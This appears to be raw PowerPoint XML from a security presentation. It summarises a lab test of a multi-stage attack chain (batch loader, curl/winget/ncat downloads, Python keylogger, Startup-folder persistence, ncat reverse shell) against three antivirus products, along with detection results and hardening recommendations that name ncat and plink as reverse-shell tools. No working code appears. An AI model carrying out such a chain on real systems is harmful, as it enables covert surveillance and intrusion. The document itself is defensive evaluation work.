          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11412727" y="6265316"/>
            <a:ext cx="800100" cy="277000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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13E29F1-38AA-0941-991C-3B703E9E025F}" type="slidenum">
              <a:rPr lang="en-BE" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="ITC Avant Garde Std Bk" panose="020B0502020202020204" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-BE" sz="1200">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="ITC Avant Garde Std Bk" panose="020B0502020202020204" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="45" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{760261EB-4B2A-4F6D-8F5A-8FCFFE1375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54350"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5172375" y="812548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2" name="Picture 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E593A7C-FB1C-B42C-3285-E3D481B880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162" y="3621881"/>
            <a:ext cx="6096000" cy="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21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0666-D194-E7D8-63AD-4ACF8106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06" y="527665"/>
            <a:ext cx="10363200" cy="7287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>
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Discussion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A1BC7-6FF5-2484-A0BD-0A9E5C83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795F90E-C33A-4A18-B610-0234BECC323D}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>5/12/2025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9EF2E-AFF9-941B-4F6B-E6EEE50C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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B1E572F-10B0-EAC8-16AC-50B1DDB1C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280659"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="914399" y="1262076"/>
          <a:ext cx="11001455" cy="4945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6092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DF0B-8DC6-8B87-B42E-6FD8E04B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471" y="572415"/>
            <a:ext cx="10245970" cy="718647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chemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Conclusion: Multi-Stage Stealth, Limited Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="320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5A42-4A52-136B-DF18-070879E07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73838"/>
            <a:ext cx="4723098" cy="19758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600" b="1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Attack Chain Stages Tested</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="493395" lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1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Batch Loader Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>cmd_commands.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400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)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="493395" lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1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Tool Downloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>winget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400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)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="493395" lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1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Keylogger Deployment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>keylog.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400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)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="493395" lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1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Persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400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 via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" i="1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Startup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400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 folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="493395" lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1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Reverse Shell (C2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400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 using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="140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CA912-0EC1-BCB3-769A-DB46AB6F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990E-9E8F-4515-9C51-4E72D42F0A97}" type="datetime1">
              <a:rPr lang="fr-FR"/>
              <a:t>12/05/2025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16C0D-AA98-F5DE-D0BB-260DEF11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7DDC5-65BE-0950-E1AB-6F52E4039A61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6486768" y="1374205"/>
            <a:ext cx="5061764" cy="21037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1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Detection Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="493395" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="12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GB" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows Defender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>: Detected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>some early stages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, but only after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>user manually approved execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="493395" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="12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GB" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Bitdefender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>No detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, despite active payloads and moderate RAM usage.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="493395" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="12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GB" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Kaspersky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Highest RAM usage (~311 MB)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>zero alerts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> across all 4 stages.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4C84C4-F4A0-3CC8-1736-A5D03E9EFA6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="905280" y="3946769"/>
            <a:ext cx="5485098" cy="28150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1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Insight</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="493395" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Stages 3–5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> (keylogger, persistence, C2) went completely undetected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="493395" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Antivirus tools failed to correlate activity or flag abnormal persistence.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="493395" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Telemetry (Sysmon, Event Logs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> was the only way to reconstruct the full attack flow.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400"/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FE41F-DCBF-935F-E44C-4C4A6C52AD8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6486769" y="3946769"/>
            <a:ext cx="4801251" cy="2250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GB" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Takeaway</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="493395" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="12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GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>High resource usage ≠ high protection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="493395" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="12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GB" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Without behavioural detection and host-level logging, stealth attacks bypass traditional AV—even across all five stages.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endParaRPr lang="en-GB" sz="1600"/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659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EB09-28A7-75AA-9828-4897B67C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538" y="565808"/>
            <a:ext cx="10363200" cy="641231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chemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Actionable Recommendations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr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F2BC813-46B6-F54B-35E9-1BE54BD5C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532545"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="912548" y="1343952"/>
          <a:ext cx="10801131" cy="50203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2510">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2778402250"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6128244">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3030867082"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3600377">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3747559831"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="44839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b="1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Priority</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1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Hardening Action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Rationale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58300"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="754124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High</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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Enable Defender ASR or equivalent EDR script-blocking policy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Prevents execution of scripts and batch loaders even if the user clicks "Run anyway"</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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345162"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="754124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High</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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Continuously monitor the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="1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Startup</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="18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 folder and autorun locations</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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The test showed persistent batch/keylogger files running without detection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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804601"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="754124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Medium</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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Add alerts for reverse-shell tools like </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" u="none" strike="noStrike" noProof="0" err="1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Consolas"/>
                        </a:rPr>
                        <a:t>ncat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="18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, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="18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Consolas"/>
                        </a:rPr>
                        <a:t>plink</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="18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, or suspicious outbound </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="18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Consolas"/>
                        </a:rPr>
                        <a:t>cmd.exe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C2 connection occurred with minimal resource use and no alert in Bitdefender</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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468602"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="754124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Medium</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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Maintain detailed host telemetry (Sysmon with Event IDs 1, 3, 11, 22)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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Essential to reconstruct attack flow when alerts fail; helps spot hidden activity</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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76198"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="754124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Low</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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Whitelist admin uses of Python, curl, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" b="0" i="0" u="none" strike="noStrike" noProof="0" err="1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winget</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="18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 in pipelines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Reduces false positives from Defender while preserving coverage for abuse cases</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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44704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A12A0-561B-B68D-593A-5CC69FE1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BC10-F3B7-40F8-87E0-5354FB4E42FD}" type="datetime1">
              <a:rPr/>
              <a:t>12/05/2025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3F7CD-478E-CA10-4293-BDB6AA22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74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61C8-3726-B492-D959-0721E44A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accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>THANK YOU!  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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B3B86-30D6-AB23-5B37-C5F928C3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C25BD91-30DA-478A-A0E3-22977C946DBD}" type="datetime1">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>12/05/2025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5F909-49DC-AE36-6B29-50D2BAF9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06B91B5-8EBF-13EB-0FC8-2A188EEC2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642369"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="914399" y="2559171"/>
          <a:ext cx="10363200" cy="338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7804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510C-A341-C3D0-85EB-5BC85F8A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759" y="1463038"/>
            <a:ext cx="4880190" cy="716737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accent1">
                    <a:lumMod val="49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CE60-1591-EA47-8C43-E6EB0F88B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622" y="2151991"/>
            <a:ext cx="10384766" cy="37090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GB" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49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GB" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Hutchins, E. M., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloppert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, M. J., &amp; Amin, R. M. (2011). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Intelligence-Driven Computer Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> (Lockheed Martin Cyber Kill Chain® white-paper).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>MITRE ATT&amp;CK®. (n.d.). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Enterprise Matrix &amp; Technique IDs T1059.006, T1056.001, T1095, T1105, T1547.001.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49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https://attack.mitre.org/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> documentation. (n.d.). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49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https://pynput.readthedocs.io/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Nmap Network Scanning – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>: The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Utility.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
